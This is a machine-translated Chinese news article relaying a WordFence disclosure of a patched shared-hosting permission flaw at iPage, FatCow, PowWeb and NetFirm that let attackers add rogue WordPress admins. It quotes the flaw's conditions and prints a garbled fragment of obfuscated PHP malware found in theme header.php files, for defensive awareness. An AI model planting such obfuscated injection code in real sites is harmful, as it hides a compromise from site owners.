在iPage,FatCow,PowWeb和NetFirm上發現的Web主機漏洞

[ad_1]
在iPage,FatCow,PowWeb和NetFirm上發現的Web主機漏洞

WordFence宣布他們在四家託管公司發現了一個漏洞。 WordFence警告說,雖然該漏洞已修補,但可能的網站在修復之前被黑客入侵。

伺服器設置允許黑客創建WordPress管理員帳戶,從中可以利用添加到WordPress主題的惡意代碼來利用這些站點。

WordFence敦促網站管理員檢查他們的網站是否存在流氓管理員帳戶(如果他們託管在iPage,FatCow,PowWeb或NetFirm上)。這四家公司都歸同一家公司Endurance International Group所有。

什麼是伺服器漏洞?

受影響的伺服器具有允許攻擊者查看敏感文件的許可權和文件設置。其他漏洞允許攻擊者訪問資料庫,將自己添加為管理員然後接管該網站。

這就是WordFence描述漏洞的方式:

「存在導致此漏洞的四個條件:

1.客戶文件都存儲在共享文件系統中。

2.用戶的Web根目錄的完整路徑是公開的或可能被猜到。

3.客戶站點根目錄路徑中的所有目錄都是遍歷世界的(「所有用戶」的執行位為1)或組遍歷(「組」的執行位為1),以及敏感文件世界可讀(「所有用戶」的讀取位為1)或組可讀(「組」的讀取位為1)。

4.攻擊者可以使組www中運行的程序讀取任意位置的文件。「

網站可能會受到感染

WordFence警告說,在此漏洞被修復之前有一段時間,在這四個主機提供商上託管的網站可能已被感染。

建議網站所有者檢查其用戶列表,以確保沒有未經授權的管理員。如果您的網站受到影響,則應該添加到主題中的流氓代碼。

以下是WordFence如何描述流氓代碼:

「如果您的網站在修復之前被利用,攻擊者可能會添加可能仍然存在的惡意軟體。我們的客戶在活動主題的header.php文件的頂部添加了混淆代碼,類似於:

<?php $ {「 x47 x4c x4f x42 x41 x4c x53」}(「dd x70 x68z x67 x64gx」)=「sl x77k x77i」; $ {「 x47 x4cO X42 x41L X53」 }(『C X7A X66 x6dubkdo X6A X78「)=』 X6C x6f X63 X61T X69 x6fn」; $ {「 X47 x4c x4fB x41LS」}(『 X67 64 x64e X74 x62p x75f x65i』)=」 x68t X6D X6C」; $ {『 X47 x4cOB X41 x4cS』}(「 x77i x64的 X68 x6bv x6da」)=」 x73t X72 X66「; $ {『 X47 x4c x4f X42 X41 x4c X53』}(『 x66s X75 X71 X79 x6evw』 )=」 b x6f X74「; $ {『 X47 x4cOBAL X53』}(『W X6C X79 X63 X61 X76 X62 X71 X68 x6f X6C X75」)=』 CAC X68 X65」 ; $ {『G x4cO X42 x41L X53』}(『RY X68 x72ku X6B』)=」 X73 x63h X65 X6D X65「; $ {「 X47 x4c x4f X42 x41L X53」 }(『 X74 X6A x6bc x64e X65 x69w』)=」 x73l x77k x77i X32「; $ {『G x4cOBA x4cS』 }(「 X79 X65 64 X73 X67 x6ah X69 X73 X67「)=」 X73 X6C x74l X65 x69l X73」;」

漏洞已得到修復

在發布公告之前,WordFence向託管公司披露了這一漏洞。託管公司迅速修復了漏洞。

儘管如此,根據WordFence提供的指導,您可能希望檢查您的用戶列表中的惡意管理員級別帳戶,並查看您的header.php文件中的惡意代碼。

閱讀WordFence博客上的整個公告

Shutterstock的圖片,作者修改

相關文章